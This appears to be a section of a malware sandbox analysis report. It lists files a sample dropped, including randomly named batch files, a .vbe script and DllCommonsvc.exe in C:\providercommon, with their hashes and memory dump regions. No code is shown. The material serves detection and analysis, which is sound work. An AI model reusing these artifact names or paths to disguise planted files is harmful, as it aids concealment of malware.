ec87ab50bbdf0b1f22a0772d0bf45b4b5c8770e9

SHA256
ab01ad647721d10b0fedb86bf8ed88d2e327bd3d6c09db9361c89dcc75cf09b6

SHA512
56650cdd242102c3b57e1a6456f560fe0ab361400886f3dac6b0f879169b189dddac0c0323acc40747ea8a7e9c2eec96d8b3c5c5bef93f23710969ac51a09267

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab2F2D.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\GUMorhJGzB.bat

Filesize
191B

MD5
8ddf9bc50187a39bea0ddb3f30cb46cc

SHA1
0c4ffb05e5c6c31b1c8691025ae9e33e70e478f5

SHA256
a75e8d5cec33e65da494f3d50cfcdec77d38cc45c95f99dec95cf0cc9d710559

SHA512
d88c64b220b6a67542445a8ccb134d150c099dab2e53779f0ec7b3ed2c5ecc2d4dc2ebed9f12cd04f299675abe4b69d15c9b66517a7428fee8e10707d01c1109

Download Submit
C:\Users\Admin\AppData\Local\Temp\OTxxDhnLNa.bat

Filesize
191B

MD5
69b9ddf46f8a8066a60e66fb9c1cccbc

SHA1
8d0183d366b54ba10df31f7d6887a6d3ebd39f2a

SHA256
6efa106b23bf4bc0ddaccc5512cc49f21cbd5366fa93e35bb063934485426c03

SHA512
3803c80712005d1f437823411b83178d8c24b8f0f27252f94c3a4b01c5b21ab7558b72c9c2471bd9b79c7620b8f1029e62d2c1af63cc03e5a121db2f14759ed6

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar2F4F.tmp

Filesize
181KB

MD5
4ea6026cf93ec6338144661bf1202cd1

SHA1
a1dec9044f750ad887935a01430bf49322fbdcb7

SHA256
8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

SHA512
6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Download Submit
C:\Users\Admin\AppData\Local\Temp\lAZRwHYzWc.bat

Filesize
191B

MD5
f7be1871eae3179dcd12c679c6e331c9

SHA1
a1d47e24d6d55178c1a28ac26f6c742b46c023cd

SHA256
41924b2d5666fd8ddc5eef0cd4a156e9d7c72a9186aa37efe2be4883259c8484

SHA512
a964222886969f20d312fefc89f7cc60218f4eb738dbef4bcce2607d74fd48189f6b5c3eb81286c9843f49ba70d8de72a0b2095829a5d389fc5dbe6ab546f13c

Download Submit
C:\Users\Admin\AppData\Local\Temp\pFE2FgvhS1.bat

Filesize
191B

MD5
346556e028bee68c3901ccde63a76f46

SHA1
6f89f747822efe7f580c85fb9427b872a920b77a

SHA256
e719b930c116fd6c2dacad3b5700240ed647894d46ceaa22742b75a6a9308c79

SHA512
70b0e090aa4077659cbcf37e74e022ea9252d0d0fec796bc28a13ad1636490bddd2fe5c3c52810bab48c672e412620670e0b1c7142cec6f5c2461bfddba76133

Download Submit
C:\Users\Admin\AppData\Local\Temp\qRj2XQE6t6.bat

Filesize
191B

MD5
9b75535b6927cd251feb5721be58a867

SHA1
a0b1bb9d40f77678e2e875c3e906cf9e164c8c57

SHA256
7297e82213fdb6c8249c79d3d6dac878496df6ca20f1b2345d56e4fc8982b075

SHA512
08e5a6c38433fe903f45f014cf2c1fc994c16da59e4f2db38ef12dec62ab1a5e5886c9540bb94d8cebc2e577a8c578cd637d215d4feccd5a5431265be84c431b

Download Submit
C:\Users\Admin\AppData\Local\Temp\tbw0avzYF4.bat

Filesize
191B

MD5
5d2f0873c63efdc358dbd5b8fecfd7ef

SHA1
b209e8fe34781780b34f5fe75a5213534add3d7a

SHA256
ec37849b1f0598e9be47c54254d9affed59f2fb295adfb314413f9b45a3e05ae

SHA512
2f41e9b929cb4edf3fb8e45bf5d21f41d31e9a7f6031babb9f08c7a2acb8fccf6619dc91f5c3ff32797cb9315ab2c604e3bc757df8f64b211dfc57fe970beca7

Download Submit
C:\Users\Admin\AppData\Local\Temp\vhzsSyDvNE.bat

Filesize
191B

MD5
fadec19aaf0b7471c7fe49f023ac5693

SHA1
3631b5b40b8044959a261065228dd7e1eda4a11c

SHA256
44197825a2cdf658d3a47f9303be032317295402c7b7363fa4c14967909c6c47

SHA512
fcf92474c2818f8ba93bd7b44e8ee9b57eb7a1ebc5e0688e142d513784960d3bd7b72e3da9c30be4cc8166466944ac7b8c04a1cec4e954fda18ef88cf05b2aa4

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
991e124a43eef8c3c0029cc251006c6c

SHA1
05697268243e0b35395011600f0c0cde3b7075eb

SHA256
3975e0577f60a116d76666e6b206c15593a3c7fd6622469dd54d0f98b3099508

SHA512
eb599477c91ff7472ef4dbc5a5a6e31d3c8fd8fbe025d502e6e4be4fb61ade791955c0949f820c7485c088afef4ac41e32bb71fffa88750e4f062ee8491c5c71

Download Submit
C:\providercommon\1zu9dW.bat

Filesize
36B

MD5
6783c3ee07c7d151ceac57f1f9c8bed7

SHA1
17468f98f95bf504cc1f83c49e49a78526b3ea03

SHA256
8ab782f0f327a2021530e7230d3aee8abbecb7eed59482a3a46e78b9e3862322

SHA512
c6012d4bfac1ed14d0fd9f0eabd0e1c3d647b343db292a907b246271d52a4b7469c809db43910ddba2e8c5045f9cb3d24d0af62d363281e6cb8b39ee94a183e8

Download Submit
C:\providercommon\DllCommonsvc.exe

Filesize
1.0MB

MD5
bd31e94b4143c4ce49c17d3af46bcad0

SHA1
f8c51ff3ff909531d9469d4ba1bbabae101853ff

SHA256
b5199d3eb28e7de8ec4a5de66cb339a03d90b297e2292473badaab98ade15c63

SHA512
f96658bd19b672fd84038bd7e95c89e14f4e6f84e3ce9c6fe3216861a41203406148c6a809c2ab350d0d6c5919c845f619deb1fc9b1f1814dfce87e566bc2394

Download Submit
C:\providercommon\yTUdeXjbLOhnrN32dgrxVg.vbe

Filesize
197B

MD5
8088241160261560a02c84025d107592

SHA1
083121f7027557570994c9fc211df61730455bb5

SHA256
2072cc9a4a3b84d4c5178ab41c5588eea7d0103e3928e34d64f17bf97f3d1cc1

SHA512
20d9369dd359315848ea30144383a0bb479d86059fdbc3b3256ac84f998193512feb3b1799ab663619920c99fe7e0ebba33ada31a3855094b956fcd351c90478

Download Submit
memory/1168-185-0x0000000000C40000-0x0000000000D50000-memory.dmp

Filesize
1.1MB

Download
memory/1836-557-0x0000000001040000-0x0000000001150000-memory.dmp

Filesize
1.1MB

Download
memory/1844-617-0x00000000012C0000-0x00000000013D0000-memory.dmp

Filesize
1.1MB

Download
memory/2160-170-0x0000000002410000-0x0000000002418000-memory.dmp

Filesize
32KB

Download
memory/2160-167-0x000000001B260000-0x000000001B542000-memory.dmp

Filesize
2.9MB

Download
memory/2200-318-0x0000000000370000-0x0000000000480000-memory.dmp

Filesize
1.1MB

Download
memory/2636-497-0x0000000000060000-0x0000000000170000-memory.dmp

Filesize
1.1MB

Download
memory/2968-378-0x0000000001220000-0x0000000001330000-memory.dmp

Filesize
1.1MB

Download
memory/2976-66-0x00000000022E0000-0x00000000022E8000-memory.dmp

Filesize
32KB

Download
memory/2976-65-0x000000001B270000-0x000000001B552000-memory.dmp

Filesize
2.9MB

Download
memory/3012-14-0x00000000003D0000-0x00000000003E2000-memory.dmp

Filesize
72KB

Download
memory/3012-13-0x0000000000F30000-0x0000000001040000-memory.dmp

Filesize
1.1MB

Download
memory/3012-15-0x0000000000480000-0x000000000048C000-memory.dmp

Filesize
48KB

Download
memory/3012-16-0x00000000003E0000-0x00000000003EC000-memory.dmp

Filesize
48KB

Download
memory/3012-17-0x00000000003F0000-0x00000000003FC000-memory.dmp

Filesize
48KB

Download